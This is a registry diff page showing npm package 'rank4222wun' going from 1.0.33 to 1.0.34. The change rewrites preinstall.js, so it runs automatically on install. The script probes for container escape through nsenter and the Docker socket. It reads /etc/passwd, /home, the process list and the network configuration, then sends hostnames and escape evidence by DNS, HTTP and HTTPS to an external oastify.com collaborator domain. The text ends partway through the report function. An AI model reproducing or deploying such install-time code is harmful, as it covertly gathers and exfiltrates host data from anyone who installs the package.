npm - rank4222wun - Versions diffs - 1.0.33 → 1.0.34 - Mend

rank4222wun 1.0.33 → 1.0.34

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.33",
+  "version": "1.0.34",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -1,72 +1,215 @@
-// container-escape-confirmation.js
+// container-escape-confirmation-with-oast.js
 const { exec, spawn } = require('child_process');
 const os = require('os');
 const fs = require('fs');
 const path = require('path');
+const https = require('https');
+const dns = require('dns');
-console.log("🔍 CONTAINER ESCAPE CONFIRMATION TOOL\n");
+console.log("🔍 CONTAINER ESCAPE CONFIRMATION TOOL WITH OAST\n");
+console.log("📍 OAST Domain: ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com\n");
-const escapeConfirmation = {
+// إعدادات OAST الخاصة بك
+const OAST_CONFIG = {
+  domain: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+  httpsPort: 443,
+  httpPort: 80,
+  dnsSubdomain: 'escape-confirmation'
+};
+const evidenceLog = {
   timestamp: new Date().toISOString(),
-  // معلومات النظام الحالي
-  currentSystem: {
-    hostname: os.hostname(),
-    username: os.userInfo().username,
+  sessionId: `session-${Date.now()}-${Math.random().toString(36).substr(2, 9)}`,
+  oastDomain: OAST_CONFIG.domain,
+  // حالة النظام
+  systemInfo: {
+    currentHostname: os.hostname(),
+    currentUser: os.userInfo().username,
     platform: os.platform(),
     isContainer: null,
+    containerType: null,
     containerId: null
   },
-  // معلومات النظام المضيف (إذا تم الهروب)
-  hostSystem: {
-    confirmed: false,
-    hostname: null,
-    users: [],
-    processes: [],
-    network: {},
-    dockerInfo: null,
-    kernel: null
+  // نتائج فحص الهروب
+  escapeChecks: {
+    nsenter: { found: false, accessible: false, evidence: null },
+    dockerSocket: { found: false, writable: false, containers: [] },
+    hostMounts: { found: false, mounts: [], hostAccess: false },
+    procAccess: { accessible: false, hostPid: null },
+    kernel: { version: null, vulnerable: false, exploits: [] },
+    capabilities: { dangerous: [], hasSysAdmin: false }
   },
-  // أدلة الهروب
-  escapeEvidence: {
-    successfulMethods: [],
-    proofPoints: [],
-    filesAccessed: [],
-    hostFilesFound: false,
-    differentHostname: false
+  // أدلة قاطعة على الهروب
+  definitiveEvidence: {
+    differentHostnameConfirmed: false,
+    hostFilesAccess: false,
+    hostUsersReadable: false,
+    hostNetworkVisible: false,
+    hostProcessesVisible: false
   },
-  // نتائج التحقق
-  verificationResults: {
+  // نتائج OAST
+  oastResults: {
+    dnsCalled: false,
+    httpCalled: false,
+    httpsCalled: false,
+    interactions: []
+  },
+  // النتيجة النهائية
+  finalVerdict: {
     escapedToHost: false,
-    confidenceLevel: 0, // 0-100%
-    riskLevel: 'UNKNOWN'
+    confidence: 0,
+    riskLevel: 'UNKNOWN',
+    escapeMethods: [],
+    proofPoints: []
   }
 };
-// ===================== التحقق الأساسي =====================
-function performBasicChecks() {
-  console.log("1️⃣  إجراء التحقيقات الأساسية...\n");
+// ===================== OAST Interaction Functions =====================
+function sendOASTInteraction(type, data) {
+  const interactionId = `interaction-${Date.now()}-${Math.random().toString(36).substr(2, 6)}`;
+  const interaction = {
+    id: interactionId,
+    type: type,
+    timestamp: new Date().toISOString(),
+    data: data
+  };
+  evidenceLog.oastResults.interactions.push(interaction);
+  switch(type) {
+    case 'DNS':
+      // إرسال DNS request
+      const dnsHostname = `${interactionId}.${OAST_CONFIG.dnsSubdomain}.${OAST_CONFIG.domain}`;
+      dns.lookup(dnsHostname, (err, address) => {
+        if (!err) {
+          evidenceLog.oastResults.dnsCalled = true;
+          console.log(`✅ DNS OAST request sent: ${dnsHostname}`);
+        }
+      });
+      break;
+    case 'HTTP':
+      // إرسال HTTP request
+      const httpReq = require('http').request({
+        hostname: OAST_CONFIG.domain,
+        port: OAST_CONFIG.httpPort,
+        path: `/${interactionId}`,
+        method: 'GET',
+        headers: {
+          'User-Agent': 'ContainerEscapeConfirm/1.0',
+          'X-Session-ID': evidenceLog.sessionId,
+          'X-Check-Type': data.checkType || 'unknown'
+        }
+      }, (res) => {
+        let body = '';
+        res.on('data', chunk => body += chunk);
+        res.on('end', () => {
+          evidenceLog.oastResults.httpCalled = true;
+          console.log(`✅ HTTP OAST request sent (${res.statusCode})`);
+        });
+      });
+      httpReq.on('error', () => {});
+      httpReq.write(JSON.stringify(data));
+      httpReq.end();
+      break;
+    case 'HTTPS':
+      // إرسال HTTPS request (الأهم)
+      const httpsReq = https.request({
+        hostname: OAST_CONFIG.domain,
+        port: OAST_CONFIG.httpsPort,
+        path: `/container-escape-evidence`,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'User-Agent': 'ContainerEscapeDetector/1.0',
+          'X-Session-ID': evidenceLog.sessionId,
+          'X-Hostname': os.hostname(),
+          'X-Check-Point': data.checkPoint || 'initial'
+        }
+      }, (res) => {
+        let responseBody = '';
+        res.on('data', chunk => responseBody += chunk);
+        res.on('end', () => {
+          evidenceLog.oastResults.httpsCalled = true;
+          console.log(`✅ HTTPS evidence sent to OAST (${res.statusCode})`);
+          // تخزين رد السيرفر إذا أرسل بيانات
+          if (responseBody) {
+            try {
+              const serverResponse = JSON.parse(responseBody);
+              interaction.serverResponse = serverResponse;
+            } catch (e) {}
+          }
+        });
+      });
+      httpsReq.on('error', (e) => {
+        console.log(`⚠️  OAST HTTPS error (may be expected): ${e.message}`);
+      });
+      httpsReq.write(JSON.stringify({
+        sessionId: evidenceLog.sessionId,
+        timestamp: new Date().toISOString(),
+        checkPoint: data.checkPoint,
+        evidence: data.evidence,
+        systemInfo: evidenceLog.systemInfo
+      }));
+      httpsReq.end();
+      break;
+  }
+}
+// ===================== Phase 1: Basic Container Detection =====================
+function detectContainerEnvironment() {
+  console.log("🔍 المرحلة 1: اكتشاف بيئة الحاوية...\n");
   const checks = [
     {
-      name: 'container_check',
-      command: 'cat /proc/1/cgroup 2>/dev/null | grep -q docker && docker ps -q --filter "id=$(cat /proc/1/cgroup | grep docker | head -1 | cut -d/ -f3)" 2>/dev/null || echo "NOT_IN_CONTAINER"',
+      name: 'cgroup_check',
+      command: 'cat /proc/1/cgroup 2>/dev/null | head -5',
+      handler: (output) => {
+        if (output) {
+          if (output.includes('docker')) {
+            evidenceLog.systemInfo.isContainer = true;
+            evidenceLog.systemInfo.containerType = 'Docker';
+            // استخراج Container ID
+            const match = output.match(/docker\/([a-f0-9]{64})/);
+            if (match) {
+              evidenceLog.systemInfo.containerId = match[1].substring(0, 12);
+            }
+            console.log(`✅ في حاوية Docker: ${evidenceLog.systemInfo.containerId || 'unknown'}`);
+          } else if (output.includes('kubepods')) {
+            evidenceLog.systemInfo.isContainer = true;
+            evidenceLog.systemInfo.containerType = 'Kubernetes';
+            console.log("✅ في حاوية Kubernetes");
+          }
+        }
+      }
+    },
+    {
+      name: 'rootfs_check',
+      command: 'mount 2>/dev/null | grep "on / " | grep overlay || echo "NOT_OVERLAY"',
       handler: (output) => {
-        if (output.includes('NOT_IN_CONTAINER')) {
-          escapeConfirmation.currentSystem.isContainer = false;
-          console.log("⚠️  النظام الحالي: ليس حاوية Docker");
-        } else if (output.trim()) {
-          escapeConfirmation.currentSystem.isContainer = true;
-          escapeConfirmation.currentSystem.containerId = output.trim().substring(0, 12);
-          console.log(`✅ نحن داخل حاوية Docker: ${escapeConfirmation.currentSystem.containerId}`);
+        if (!output.includes('NOT_OVERLAY')) {
+          evidenceLog.systemInfo.isContainer = true;
+          console.log("✅ نظام ملفات overlay (حاوية)");
         }
       }
     },
     {
-      name: 'namespace_check',
-      command: 'ls -la /proc/1/ns/ 2>/dev/null | head -20',
+      name: 'container_runtime',
+      command: 'which docker podman containerd 2>/dev/null | head -1 || echo "NO_RUNTIME"',
       handler: (output) => {
-        if (output.includes('pid') && output.includes('mnt') && output.includes('net')) {
-          console.log("✅ Namespaces نشطة");
+        if (!output.includes('NO_RUNTIME')) {
+          console.log(`✅ Container runtime موجود: ${output.trim()}`);
         }
       }
     }
@@ -75,123 +218,213 @@ function performBasicChecks() {
   let completed = 0;
   checks.forEach(check => {
     exec(check.command, { timeout: 3000 }, (err, stdout) => {
-      if (!err) check.handler(stdout);
+      if (!err && stdout) check.handler(stdout);
       completed++;
       if (completed === checks.length) {
-        setTimeout(checkEscapeMethods, 2000);
+        // إرسال DNS check إلى OAST
+        sendOASTInteraction('DNS', {
+          checkType: 'container_detection',
+          result: evidenceLog.systemInfo
+        });
+        setTimeout(performEscapeVerification, 2000);
       }
     });
   });
 }
-// ===================== فحص طرق الهروب الناجحة =====================
-function checkEscapeMethods() {
-  console.log("\n2️⃣  فحص طرق الهروب التي نجحت...\n");
+// ===================== Phase 2: Escape Verification =====================
+function performEscapeVerification() {
+  console.log("\n🔍 المرحلة 2: التحقق من الهروب الفعلي...\n");
+  // إرسال HTTP ping إلى OAST
+  sendOASTInteraction('HTTP', {
+    checkPoint: 'escape_verification_start',
+    currentHostname: evidenceLog.systemInfo.currentHostname
+  });
-  const escapeChecks = [
-    // 1. التحقق من nsenter
+  const verificationTests = [
+    // Test 1: nsenter access
     {
-      name: 'nsenter_escape',
+      name: 'nsenter_test',
       commands: [
-        'which nsenter 2>/dev/null',
-        'nsenter --target 1 --mount -- sh -c "echo HOST_CHECK: && cat /etc/hostname && echo CONTAINER_CHECK: && hostname" 2>/dev/null || echo "FAILED"'
+        'which nsenter 2>/dev/null || echo "NOT_FOUND"',
+        'timeout 2 nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname)" 2>/dev/null || echo "FAILED"'
       ],
-      check: (results) => {
-        if (results[0] && results[1] && results[1].includes('HOST_CHECK:')) {
-          const output = results[1];
-          const lines = output.split('\n');
-          const hostHostname = lines.find(l => l.includes('HOST_CHECK:'));
-          const containerHostname = lines.find(l => l.includes('CONTAINER_CHECK:'));
+      handler: (results) => {
+        const [nsenterPath, nsenterOutput] = results;
+        evidenceLog.escapeChecks.nsenter.found = !nsenterPath.includes('NOT_FOUND');
+        if (nsenterOutput && !nsenterOutput.includes('FAILED')) {
+          evidenceLog.escapeChecks.nsenter.accessible = true;
-          if (hostHostname && containerHostname) {
-            const host = hostHostname.replace('HOST_CHECK:', '').trim();
-            const container = containerHostname.replace('CONTAINER_CHECK:', '').trim();
-            if (host && container && host !== container) {
-              escapeConfirmation.hostSystem.hostname = host;
-              escapeConfirmation.escapeEvidence.differentHostname = true;
-              escapeConfirmation.escapeEvidence.successfulMethods.push('nsenter');
-              escapeConfirmation.escapeEvidence.proofPoints.push(`hostname المضيف (${host}) ≠ hostname الحاوية (${container})`);
-              return true;
+          // تحليل النتيجة
+          const lines = nsenterOutput.split('\n');
+          let hostHostname = '';
+          let containerHostname = '';
+          lines.forEach(line => {
+            if (line.startsWith('HOST_HOSTNAME:')) {
+              hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
             }
+            if (line.startsWith('CONTAINER_HOSTNAME:')) {
+              containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
+            }
+          });
+          if (hostHostname && containerHostname && hostHostname !== containerHostname) {
+            evidenceLog.definitiveEvidence.differentHostnameConfirmed = true;
+            evidenceLog.escapeChecks.nsenter.evidence = `Host: ${hostHostname}, Container: ${containerHostname}`;
+            console.log(`🎯 DETECTED: Different hostnames! Host: ${hostHostname}, Container: ${containerHostname}`);
+            // إرسال أدلة قوية إلى OAST
+            sendOASTInteraction('HTTPS', {
+              checkPoint: 'nsenter_escape_confirmed',
+              evidence: {
+                hostHostname: hostHostname,
+                containerHostname: containerHostname,
+                method: 'nsenter'
+              }
+            });
           }
         }
-        return false;
       }
     },
-    // 2. التحقق من Docker Socket access
+    // Test 2: Docker socket access
+    {
+      name: 'docker_socket_test',
+      commands: [
+        'ls -la /var/run/docker.sock 2>/dev/null | head -1 || echo "NOT_FOUND"',
+        'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -o \'"ID":"[^"]*"\' | head -1 || echo "NO_ACCESS"'
+      ],
+      handler: (results) => {
+        const [socketInfo, dockerInfo] = results;
+        evidenceLog.escapeChecks.dockerSocket.found = !socketInfo.includes('NOT_FOUND');
+        evidenceLog.escapeChecks.dockerSocket.writable = socketInfo.includes('rw');
+        if (!dockerInfo.includes('NO_ACCESS') && dockerInfo.includes('ID')) {
+          evidenceLog.escapeChecks.dockerSocket.accessible = true;
+          console.log("✅ Docker socket accessible from container!");
+          // محاولة سرد الحاويات الأخرى
+          exec('curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 2>/dev/null | wc -l || echo "0"',
+            (err, stdout) => {
+              if (!err && stdout && !isNaN(parseInt(stdout))) {
+                const containerCount = parseInt(stdout);
+                if (containerCount > 1) {
+                  evidenceLog.escapeChecks.dockerSocket.containers = [`Found ${containerCount} total containers`];
+                  console.log(`🎯 DETECTED: Can see ${containerCount} containers on host`);
+                  sendOASTInteraction('HTTPS', {
+                    checkPoint: 'docker_socket_access',
+                    evidence: {
+                      socketAccessible: true,
+                      containerCount: containerCount,
+                      method: 'docker_socket'
+                    }
+                  });
+                }
+              }
+            });
+        }
+      }
+    },
+    // Test 3: Host filesystem access
     {
-      name: 'docker_socket_escape',
+      name: 'host_files_test',
       commands: [
-        'ls -la /var/run/docker.sock 2>/dev/null || echo "NOT_FOUND"',
-        'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -q "ID" && echo "ACCESSIBLE" || echo "NO_ACCESS"'
+        'cat /proc/1/mountinfo 2>/dev/null | grep -E "/ / " | head -1 || echo "NO_INFO"',
+        'ls -la /home 2>/dev/null | head -5 || echo "NO_ACCESS"',
+        'cat /etc/passwd 2>/dev/null | head -3 || echo "NO_ACCESS"'
       ],
-      check: (results) => {
-        if (results[0] && !results[0].includes('NOT_FOUND') && results[1] && results[1].includes('ACCESSIBLE')) {
-          escapeConfirmation.escapeEvidence.successfulMethods.push('docker_socket');
-          escapeConfirmation.escapeEvidence.proofPoints.push('Docker socket متاح للقراءة/الكتابة');
-          return true;
+      handler: (results) => {
+        const [mountInfo, homeAccess, passwdAccess] = results;
+        if (!homeAccess.includes('NO_ACCESS')) {
+          evidenceLog.definitiveEvidence.hostFilesAccess = true;
+          console.log("🎯 DETECTED: Can access /home directory of host!");
+        }
+        if (!passwdAccess.includes('NO_ACCESS')) {
+          evidenceLog.definitiveEvidence.hostUsersReadable = true;
+          console.log("🎯 DETECTED: Can read /etc/passwd of host!");
+        }
+        if (evidenceLog.definitiveEvidence.hostFilesAccess || evidenceLog.definitiveEvidence.hostUsersReadable) {
+          sendOASTInteraction('HTTPS', {
+            checkPoint: 'host_filesystem_access',
+            evidence: {
+              homeAccess: evidenceLog.definitiveEvidence.hostFilesAccess,
+              passwdAccess: evidenceLog.definitiveEvidence.hostUsersReadable
+            }
+          });
         }
-        return false;
       }
     },
-    // 3. التحقق من Host mounts
+    // Test 4: Host processes access
     {
-      name: 'host_mounts_escape',
+      name: 'host_processes_test',
       commands: [
-        'mount 2>/dev/null | grep "on / " | grep "type overlay" || echo "NO_OVERLAY"',
-        'cat /proc/1/mountinfo 2>/dev/null | grep "/ / " | head -1'
+        'ps aux 2>/dev/null | head -10 || echo "NO_PS"',
+        'cat /proc/1/status 2>/dev/null | head -5 || echo "NO_ACCESS"'
       ],
-      check: (results) => {
-        if (results[0] && !results[0].includes('NO_OVERLAY')) {
-          escapeConfirmation.escapeEvidence.successfulMethods.push('host_mounts');
-          escapeConfirmation.escapeEvidence.proofPoints.push('نظام الملفات من نوع overlay (مشترك مع المضيف)');
-          return true;
+      handler: (results) => {
+        const [psOutput, proc1Status] = results;
+        if (!psOutput.includes('NO_PS') && psOutput.split('\n').length > 5) {
+          evidenceLog.definitiveEvidence.hostProcessesVisible = true;
+          console.log("✅ Can see host processes");
+        }
+        if (!proc1Status.includes('NO_ACCESS')) {
+          evidenceLog.escapeChecks.procAccess.accessible = true;
+          evidenceLog.escapeChecks.procAccess.hostPid = '1';
+          console.log("🎯 DETECTED: Can access host init process (PID 1)!");
         }
-        return false;
       }
     },
-    // 4. التحقق من /proc access
+    // Test 5: Network visibility
     {
-      name: 'proc_escape',
+      name: 'network_test',
       commands: [
-        'cat /proc/1/status 2>/dev/null | head -5',
-        'cat /proc/1/cmdline 2>/dev/null | tr "\\0" " "'
+        'ip route show 2>/dev/null | head -3 || echo "NO_ROUTE"',
+        'hostname -I 2>/dev/null || ip addr show 2>/dev/null | grep "inet " | head -3 || echo "NO_IP"'
       ],
-      check: (results) => {
-        if (results[0] && results[0].includes('State:')) {
-          escapeConfirmation.hostSystem.processes.push('Init process accessible via /proc/1/');
-          escapeConfirmation.escapeEvidence.successfulMethods.push('proc_access');
-          return true;
+      handler: (results) => {
+        const [routeOutput, ipOutput] = results;
+        if (!routeOutput.includes('NO_ROUTE') || !ipOutput.includes('NO_IP')) {
+          evidenceLog.definitiveEvidence.hostNetworkVisible = true;
+          console.log("✅ Can see host network configuration");
         }
-        return false;
       }
     }
   ];
-  let methodsChecked = 0;
-  escapeChecks.forEach(method => {
-    const results = [];
+  let testsCompleted = 0;
+  const testResults = {};
+  verificationTests.forEach(test => {
+    testResults[test.name] = [];
     let commandsCompleted = 0;
-    method.commands.forEach((cmd, idx) => {
+    test.commands.forEach((cmd, idx) => {
       exec(cmd, { timeout: 5000 }, (err, stdout) => {
-        results[idx] = stdout || '';
+        testResults[test.name][idx] = stdout || '';
         commandsCompleted++;
-        if (commandsCompleted === method.commands.length) {
-          if (method.check(results)) {
-            console.log(`✅ ${method.name}: ناجح`);
-          } else {
-            console.log(`❌ ${method.name}: فشل أو غير متاح`);
-          }
+        if (commandsCompleted === test.commands.length) {
+          test.handler(testResults[test.name]);
+          testsCompleted++;
-          methodsChecked++;
-          if (methodsChecked === escapeChecks.length) {
-            setTimeout(collectHostEvidence, 3000);
+          if (testsCompleted === verificationTests.length) {
+            setTimeout(analyzeEvidence, 3000);
           }
         }
       });
@@ -199,205 +432,198 @@ function checkEscapeMethods() {
   });
 }
-// ===================== جمع أدلة من المضيف =====================
-function collectHostEvidence() {
-  console.log("\n3️⃣  جمع أدلة من النظام المضيف...\n");
-  const evidenceCommands = [
-    {
-      name: 'host_users',
-      command: 'cat /etc/passwd 2>/dev/null | head -10',
-      storeIn: 'hostSystem.users'
-    },
-    {
-      name: 'host_processes_full',
-      command: 'ps aux 2>/dev/null | head -15',
-      storeIn: 'hostSystem.processes'
-    },
-    {
-      name: 'host_network',
-      command: 'ip addr show 2>/dev/null | head -30',
-      storeIn: 'hostSystem.network.interface'
-    },
-    {
-      name: 'host_kernel',
-      command: 'uname -r',
-      storeIn: 'hostSystem.kernel'
-    },
-    {
-      name: 'docker_on_host',
-      command: 'docker ps -a 2>/dev/null | wc -l',
-      storeIn: 'hostSystem.dockerInfo'
-    },
-    {
-      name: 'host_files_access',
-      command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || echo "NO_ACCESS"',
-      storeIn: 'escapeEvidence.filesAccessed'
-    }
-  ];
-  let evidenceCollected = 0;
-  evidenceCommands.forEach(evidence => {
-    exec(evidence.command, { timeout: 5000 }, (err, stdout) => {
-      if (!err && stdout && !stdout.includes('NO_ACCESS')) {
-        // تحديد المسار للخزن
-        const path = evidence.storeIn.split('.');
-        let target = escapeConfirmation;
-        for (let i = 0; i < path.length - 1; i++) {
-          if (!target[path[i]]) target[path[i]] = {};
-          target = target[path[i]];
-        }
-        target[path[path.length - 1]] = stdout.trim();
-        if (evidence.name === 'host_files_access' && !stdout.includes('NO_ACCESS')) {
-          escapeConfirmation.escapeEvidence.hostFilesFound = true;
-        }
-        console.log(`✅ ${evidence.name}: تم جمعه`);
-      }
-      evidenceCollected++;
-      if (evidenceCollected === evidenceCommands.length) {
-        setTimeout(analyzeResults, 2000);
-      }
-    });
-  });
-}
-// ===================== تحليل النتائج =====================
-function analyzeResults() {
-  console.log("\n4️⃣  تحليل النتائج وتأكيد الهروب...\n");
+// ===================== Phase 3: Evidence Analysis =====================
+function analyzeEvidence() {
+  console.log("\n🔍 المرحلة 3: تحليل الأدلة وتقييم الثقة...\n");
   let confidenceScore = 0;
   const maxScore = 100;
+  const escapeMethods = [];
+  const proofPoints = [];
-  // 1. أدلة قوية على الهروب (25 نقطة لكل)
-  if (escapeConfirmation.escapeEvidence.differentHostname) {
+  // 1. أدلة قاطعة (25 نقطة لكل)
+  if (evidenceLog.definitiveEvidence.differentHostnameConfirmed) {
     confidenceScore += 25;
-    console.log("🎯 دليل قوي: hostname المضيف ≠ hostname الحاوية");
+    proofPoints.push("Hostname المضيف ≠ Hostname الحاوية (أقوى دليل)");
   }
-  if (escapeConfirmation.escapeEvidence.hostFilesFound) {
+  if (evidenceLog.definitiveEvidence.hostFilesAccess) {
     confidenceScore += 25;
-    console.log("🎯 دليل قوي: الوصول لملفات المضيف (/home أو /root)");
+    proofPoints.push("الوصول لملفات /home في المضيف");
   }
-  // 2. طرق هروب ناجحة (15 نقطة لكل)
-  escapeConfirmation.escapeEvidence.successfulMethods.forEach(method => {
+  if (evidenceLog.definitiveEvidence.hostUsersReadable) {
+    confidenceScore += 20;
+    proofPoints.push("قراءة /etc/passwd للمضيف");
+  }
+  // 2. أدلة قوية (15 نقطة لكل)
+  if (evidenceLog.escapeChecks.nsenter.accessible) {
     confidenceScore += 15;
-    console.log(`🔓 طريقة هروب ناجحة: ${method}`);
-  });
+    escapeMethods.push("nsenter");
+  }
+  if (evidenceLog.escapeChecks.dockerSocket.accessible) {
+    confidenceScore += 15;
+    escapeMethods.push("docker_socket");
+  }
+  if (evidenceLog.escapeChecks.procAccess.accessible) {
+    confidenceScore += 15;
+    escapeMethods.push("proc_access");
+  }
-  // 3. معلومات مضيف مجمعة (10 نقطة لكل)
-  if (escapeConfirmation.hostSystem.users.length > 0) {
+  // 3. أدلة مساندة (10 نقطة لكل)
+  if (evidenceLog.definitiveEvidence.hostProcessesVisible) {
     confidenceScore += 10;
-    console.log("📋 تم جمع معلومات مستخدمي المضيف");
   }
-  if (escapeConfirmation.hostSystem.processes.length > 0) {
+  if (evidenceLog.definitiveEvidence.hostNetworkVisible) {
     confidenceScore += 10;
-    console.log("📋 تم جمع عمليات المضيف");
   }
-  // حساب مستوى الثقة
-  const confidenceLevel = Math.min(100, confidenceScore);
-  escapeConfirmation.verificationResults.confidenceLevel = confidenceLevel;
+  // تحديد نتيجة الهروب
+  evidenceLog.finalVerdict.confidence = Math.min(100, confidenceScore);
+  evidenceLog.finalVerdict.escapeMethods = escapeMethods;
+  evidenceLog.finalVerdict.proofPoints = proofPoints;
-  // تحديد إذا تم الهروب فعلاً
-  if (confidenceLevel >= 50) {
-    escapeConfirmation.verificationResults.escapedToHost = true;
-    escapeConfirmation.hostSystem.confirmed = true;
-    escapeConfirmation.verificationResults.riskLevel = confidenceLevel >= 75 ? 'HIGH' : 'MEDIUM';
+  if (evidenceLog.finalVerdict.confidence >= 60) {
+    evidenceLog.finalVerdict.escapedToHost = true;
+    evidenceLog.finalVerdict.riskLevel = evidenceLog.finalVerdict.confidence >= 80 ? 'CRITICAL' : 'HIGH';
+  } else if (evidenceLog.finalVerdict.confidence >= 30) {
+    evidenceLog.finalVerdict.escapedToHost = 'POSSIBLE';
+    evidenceLog.finalVerdict.riskLevel = 'MEDIUM';
   } else {
-    escapeConfirmation.verificationResults.escapedToHost = false;
-    escapeConfirmation.verificationResults.riskLevel = 'LOW';
+    evidenceLog.finalVerdict.escapedToHost = false;
+    evidenceLog.finalVerdict.riskLevel = 'LOW';
   }
-  // إذا كنا أساساً لسنا في حاوية
-  if (escapeConfirmation.currentSystem.isContainer === false) {
-    console.log("ℹ️  ملاحظة: النظام الحالي ليس حاوية، لا يوجد هروب لتحققه");
-  }
+  // إرسال النتيجة النهائية إلى OAST
+  sendOASTInteraction('HTTPS', {
+    checkPoint: 'final_verdict',
+    evidence: {
+      escapedToHost: evidenceLog.finalVerdict.escapedToHost,
+      confidence: evidenceLog.finalVerdict.confidence,
+      escapeMethods: escapeMethods,
+      proofPoints: proofPoints
+    }
+  });
   generateFinalReport();
 }
-// ===================== التقرير النهائي =====================
+// ===================== Phase 4: Final Report =====================
 function generateFinalReport() {
-  console.log("\n" + "=".repeat(70));
-  console.log("📊 تقرير تأكيد هروب الحاوية النهائي");
-  console.log("=".repeat(70));
-  console.log(`\n⏰ وقت التحقق: ${escapeConfirmation.timestamp}`);
-  console.log(`🏷️  اسم النظام: ${escapeConfirmation.currentSystem.hostname}`);
-  console.log(`👤 المستخدم: ${escapeConfirmation.currentSystem.username}`);
-  console.log(`💻 النظام: ${escapeConfirmation.currentSystem.platform}`);
-  if (escapeConfirmation.currentSystem.isContainer !== null) {
-    console.log(`📦 داخل حاوية: ${escapeConfirmation.currentSystem.isContainer ? 'نعم' : 'لا'}`);
-    if (escapeConfirmation.currentSystem.containerId) {
-      console.log(`🔢 Container ID: ${escapeConfirmation.currentSystem.containerId}`);
-    }
+  console.log("\n" + "=".repeat(80));
+  console.log("📊 تقرير تأكيد هروب الحاوية - مع OAST");
+  console.log("=".repeat(80));
+  console.log(`\n📍 OAST Domain: ${OAST_CONFIG.domain}`);
+  console.log(`🎯 Session ID: ${evidenceLog.sessionId}`);
+  console.log(`⏰ وقت التحقق: ${new Date(evidenceLog.timestamp).toLocaleString()}`);
+  console.log("\n🔍 معلومات النظام:");
+  console.log(`   Hostname: ${evidenceLog.systemInfo.currentHostname}`);
+  console.log(`   المستخدم: ${evidenceLog.systemInfo.currentUser}`);
+  console.log(`   النظام: ${evidenceLog.systemInfo.platform}`);
+  console.log(`   في حاوية: ${evidenceLog.systemInfo.isContainer ? 'نعم (' + evidenceLog.systemInfo.containerType + ')' : 'لا'}`);
+  if (evidenceLog.systemInfo.containerId) {
+    console.log(`   Container ID: ${evidenceLog.systemInfo.containerId}`);
   }
-  console.log("\n🔍 نتائج التأكيد:");
-  console.log(`🚀 الهروب للمضيف: ${escapeConfirmation.verificationResults.escapedToHost ? '✅ مؤكد' : '❌ غير مؤكد'}`);
-  console.log(`📈 مستوى الثقة: ${escapeConfirmation.verificationResults.confidenceLevel}%`);
-  console.log(`⚠️  مستوى الخطورة: ${escapeConfirmation.verificationResults.riskLevel}`);
+  console.log("\n🎯 النتيجة النهائية:");
+  let verdictIcon = '❓';
+  let verdictText = '';
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("\n🎯 أدلة الهروب المؤكدة:");
-    escapeConfirmation.escapeEvidence.proofPoints.forEach((proof, i) => {
-      console.log(`   ${i + 1}. ${proof}`);
-    });
-    console.log("\n🔧 طرق الهروب الناجحة:");
-    escapeConfirmation.escapeEvidence.successfulMethods.forEach((method, i) => {
+  if (evidenceLog.finalVerdict.escapedToHost === true) {
+    verdictIcon = '🚨';
+    verdictText = 'هروب مؤكد من الحاوية إلى المضيف!';
+  } else if (evidenceLog.finalVerdict.escapedToHost === 'POSSIBLE') {
+    verdictIcon = '⚠️';
+    verdictText = 'هروب محتمل من الحاوية';
+  } else {
+    verdictIcon = '✅';
+    verdictText = 'الحاوية معزولة (لم يتم تأكيد الهروب)';
+  }
+  console.log(`   ${verdictIcon} ${verdictText}`);
+  console.log(`   📈 مستوى الثقة: ${evidenceLog.finalVerdict.confidence}%`);
+  console.log(`   ⚠️  مستوى الخطورة: ${evidenceLog.finalVerdict.riskLevel}`);
+  if (evidenceLog.finalVerdict.escapeMethods.length > 0) {
+    console.log(`\n🔧 طرق الهروب المكتشفة:`);
+    evidenceLog.finalVerdict.escapeMethods.forEach((method, i) => {
       console.log(`   ${i + 1}. ${method}`);
     });
-    if (escapeConfirmation.hostSystem.hostname) {
-      console.log(`\n🖥️  اسم المضيف: ${escapeConfirmation.hostSystem.hostname}`);
-    }
-    if (escapeConfirmation.hostSystem.kernel) {
-      console.log(`🐧 Kernel المضيف: ${escapeConfirmation.hostSystem.kernel}`);
-    }
   }
-  // حفظ النتائج في ملف
-  const reportFile = `/tmp/container-escape-confirmation-${Date.now()}.json`;
-  fs.writeFileSync(reportFile, JSON.stringify(escapeConfirmation, null, 2));
-  console.log(`\n💾 تم حفظ التقرير الكامل في: ${reportFile}`);
+  if (evidenceLog.finalVerdict.proofPoints.length > 0) {
+    console.log(`\n🎯 أدلة قاطعة:`);
+    evidenceLog.finalVerdict.proofPoints.forEach((proof, i) => {
+      console.log(`   ${i + 1}. ${proof}`);
+    });
+  }
-  // رسالة نهائية
-  console.log("\n" + "=".repeat(70));
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("🚨 تحذير: تم تأكيد هروب الحاوية بنجاح!");
-    console.log("🔓 النظام الحالي يمكنه الوصول للنظام المضيف");
-    console.log("🛡️  يجب اتخاذ إجراءات أمنية فورية");
-  } else if (escapeConfirmation.currentSystem.isContainer === true) {
-    console.log("✅ الحاوية معزولة بشكل مناسب");
-    console.log("🔒 لم يتم اكتشاف هروب ناجح");
-  } else if (escapeConfirmation.currentSystem.isContainer === false) {
-    console.log("ℹ️  النظام الحالي ليس حاوية");
-    console.log("📋 تم إجراء فحوصات أمنية عامة فقط");
+  console.log("\n📡 نتائج OAST:");
+  console.log(`   DNS Requests: ${evidenceLog.oastResults.dnsCalled ? '✅ تم إرسال' : '❌ لم يتم'}`);
+  console.log(`   HTTP Requests: ${evidenceLog.oastResults.httpCalled ? '✅ تم إرسال' : '❌ لم يتم'}`);
